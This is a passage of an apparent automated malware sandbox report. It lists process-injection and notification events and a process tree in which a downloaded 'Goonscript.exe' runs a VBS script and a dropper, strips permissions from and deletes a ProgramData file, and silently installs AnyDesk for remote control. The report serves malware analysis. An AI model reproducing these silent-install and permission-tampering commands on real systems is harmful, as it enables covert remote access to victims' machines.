N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\Anydesk.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4088 wrote to memory of 1836 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 1836 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4088 wrote to memory of 3288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://rb.gy/g44izl

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3476 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=3544 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4104 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5492 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6612 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7012 /prefetch:8

C:\Users\Admin\Downloads\Goonscript.exe

"C:\Users\Admin\Downloads\Goonscript.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\4987.tmp\4988.tmp\4989.vbs //Nologo

C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe

"C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4C08.tmp\4C09.tmp\4C0A.bat C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\stn.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\stn.exe" -r -force

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-service

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-control

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

